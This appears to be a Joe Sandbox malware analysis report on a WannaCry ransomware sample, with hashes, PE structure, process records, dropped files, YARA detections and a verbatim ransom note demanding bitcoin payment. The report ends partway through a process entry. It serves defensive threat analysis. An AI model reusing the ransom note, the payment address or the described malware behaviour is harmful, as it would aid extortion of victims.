http://www.btcfrog.com/qr/bitcoinPNG.php?address=13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94	@WanaDecryptor@.exe, 000000CA.00000002.2386689246.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000047.00000002.1368188268.000001DB1BE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.sZ	svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	false
https://dynamic.t	svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/search?q=how	@WanaDecryptor@.exe, 000000CA.00000002.2386689246.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 000000CA.00000002.2383911467.0000000000421000.00000004.00000001.01000000.00000009.sdmp	true
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	WannaCry_2.EXE, 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, WannaCry_2.EXE, 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 000000CA.00000002.2383911467.0000000000421000.00000004.00000001.01000000.00000009.sdmp	true
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dynamic	svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	false
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368352141.000001DB1BE59000.00000004.00000020.00020000.00000000.sdmp	false
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp	false
http://www.bingmapsportal.com	svchost.exe, 00000047.00000002.1367874845.000001DB1BE13000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368145142.000001DB1BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367043880.000001DB1BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip	@WanaDecryptor@.exe, 000000CA.00000002.2383330775.000000000019B000.00000004.00000010.00020000.00000000.sdmp	true
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000047.00000002.1367979156.000001DB1BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1366699932.000001DB1BE67000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000047.00000002.1368532706.000001DB1BE81000.00000004.00000020.00020000.00000000.sdmp	false
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1486528
Start date and time:	2024-08-02 09:27:57 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	204
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WannaCry_2.EXE
Detection:	MAL
Classification:	mal100.rans.evad.winEXE@903/948@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 49 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .EXE

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.85.23.206, 13.85.23.86, 52.165.164.15
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtSetValueKey calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:28:23	API Interceptor	1x Sleep call for process: dllhost.exe modified
03:28:24	API Interceptor	5346384x Sleep call for process: WannaCry_2.EXE modified
03:28:38	API Interceptor	2x Sleep call for process: SIHClient.exe modified
03:29:04	API Interceptor	1x Sleep call for process: @WanaDecryptor@.exe modified

Process:	C:\Users\user\Desktop\WannaCry_2.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.710902136409594
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnS4RQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3ChvWmMo+S
MD5:	7E6B6DA7C61FCB66F3F30166871DEF5B
SHA1:	00F699CF9BBC0308F6E101283ECA15A7C566D4F9
SHA-256:	4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
SHA-512:	E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
Malicious:	false
Yara Hits:	Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

Process:	C:\Windows\SysWOW64\cscript.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 2 06:28:25 2024, mtime=Fri Aug 2 06:28:25 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	575
Entropy (8bit):	5.169912156465633
Encrypted:	false
SSDEEP:	6:4xtQl3/Q3CpzeVs+bTcCSyNUtxXCzsLUyZUod6tMljAlpyl+GoJ4D6Vod6NuXumC:8UQypzYNbuyethVJUobjAvoVxmV
MD5:	F8EA44F289D28342CA387D6472C11A1C
SHA1:	E802B2E6C49303D98A8BB3806940DA670D3374F9
SHA-256:	A225F1A15A2DC344AEED3C5EBCC22D8E187B8B1A0E78A15DAE60CA40461F09EF
SHA-512:	EFBA24019016A5E63F7B3B58FCD73BB575943BB2619CE60D33608B1C35C67533B1F7ED2B52734B1633A0E3C6A25798B3E436ABE2E2D31765D30A95C76C1B5091
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....4.......[.......`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...............t.2......J.2 .@WANAD~1.EXE..X.......Y.;.Y.;.............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............E5......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......971342...........hT..CrF.f4... .I.............%..hT..CrF.f4... .I.............%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.9828343133437905
Encrypted:	false
SSDEEP:	3:gponhvDCKFcsDT6MWlynJ96JS2x9rbPT6MWlynJSK2Fvn:e+hvbGoJgJSoPGoJSK2Fv
MD5:	CF54CCA4CEA475C005EEE306DF7C73D0
SHA1:	1D1A669F4376CBB22A5C5C8D211A352AF84DC95D
SHA-256:	580B3C23A6578CDA3DC3349F3749E935BABC6FA6F2CE9B8DC58D7463C0F618A9
SHA-512:	043F8938BA7CB4F8BBF3E77667E6505271A984578869623102CF8D61A3D9162387DC200F1F8BF97DF5BEE621B0E952DD9F672150777AA18C978E1B95F3B452AE
Malicious:	true
Reputation:	unknown
Preview:	SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..

Process:	C:\Windows\System32\SIHClient.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.1608741688092925
Encrypted:	false
SSDEEP:	192:FBhqh7eQgm5ejpIXCa2zJ7bhZ4E4Blh0x:FSh7eQgmY1IXCpzJ7lZ4E4Blh0x
MD5:	BB5C4EA5D8ED4710D2D88CC5ACC8E40A
SHA1:	87A633C576330BCDF1D3DA9D4226C42DBAC13AEB
SHA-256:	503F7F61BA7896222B8260FAE2F0BA1422A2484E514E0965232CD7CCCEEC2589
SHA-512:	93D389241A7F427A2CDE83A7C8B640538B20ABCCB40C2C7C3BC047ACCC528D29246B39CECCBC5D6871D5EC0B5BB92B2E665C4C2E32C61A1D0FC010C25081C997
Malicious:	false
Reputation:	unknown
Preview:	....P...P.......................................P...!...........................l... ...-..K....................eJ......{.G.....Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1................................................................Y..........H..............S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.4.0.8.0.2...0.3.2.8.3.7...0.7.5...1...e.t.l.......P.P.l... ...-..K....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.995470941164686
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WannaCry_2.EXE
File size:	3'514'368 bytes
MD5:	84c82835a5d21bbcf75a61706d8ab549
SHA1:	5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256:	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512:	90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
SSDEEP:	98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
TLSH:	73F533F4E221B7ACF2550EF64855C59B6A9724B2EBEF1E26DA8001A70D44F7F8FC0491
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..

Entrypoint:	0x4077ba
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	68f013d7437aa653a8a98a05807afeb1

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd5a8	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x349fa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x1d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x69b0	0x7000	920e964050a1a5dd60dd00083fd541a2	False	0.5747419084821429	data	6.404235106100747	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x5f70	0x6000	2c42611802d585e6eed68595876d1a15	False	0.5781656901041666	data	6.66357096840794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0x1958	0x2000	83506e37bd8b50cacabd480f8eb3849b	False	0.394287109375	Matlab v4 mat-file (little endian) ry, numeric, rows 0, columns 0	4.4557495078691405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x10000	0x349fa0	0x34a000	f99ce7dc94308f0a149a19e022e4c316	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
XIA	0x100f0	0x349635	Zip archive data, at least v2.0 to extract, compression method=deflate	English	United States	1.0002689361572266
RT_VERSION	0x359728	0x388	data	English	United States	0.46349557522123896
RT_MANIFEST	0x359ab0	0x4ef	exported SGML document, ASCII text, with CRLF line terminators	English	United States	0.42913697545526525

DLL	Import
KERNEL32.dll	GetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
USER32.dll	wsprintfA
ADVAPI32.dll	CreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
MSVCRT.dll	realloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp

Target ID:	0
Start time:	03:28:23
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\WannaCry_2.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WannaCry_2.EXE"
Imagebase:	0x400000
File size:	3'514'368 bytes
MD5 hash:	84C82835A5D21BBCF75A61706D8AB549
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.1123120496.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.2384451558.000000000040F000.00000004.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	7
Start time:	03:28:25
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	14
Start time:	03:28:26
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	19
Start time:	03:28:27
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	03:28:28
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	03:28:29
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	03:28:30
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	37
Start time:	03:28:31
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	43
Start time:	03:28:32
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	48
Start time:	03:28:33
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	52
Start time:	03:28:34
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WannaCry_2.EXE

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\@Please_Read_Me@.txt

C:\@WanaDecryptor@.exe

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\AppV\Setup\OfficeIntegrator.ps1.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\EventStore.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\guest.bmp.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\guest.png.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user-192.png.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user.bmp.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user.png.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\cversions.2.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRY (copy)

Windows Analysis Report
WannaCry_2.EXE

Target ID:	57
Start time:	03:28:35
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	62
Start time:	03:28:36
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	67
Start time:	03:28:37
Start date:	02/08/2024
Path:	C:\Windows\System32\SIHClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\sihclient.exe /cv Uh7zHirJxEOn/q4qaZ2wzQ.0.2
Imagebase:	0x7ff745b20000
File size:	380'720 bytes
MD5 hash:	8BE47315BF30475EEECE8E39599E9273
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	85
Start time:	03:28:39
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	90
Start time:	03:28:40
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	94
Start time:	03:28:41
Start date:	02/08/2024
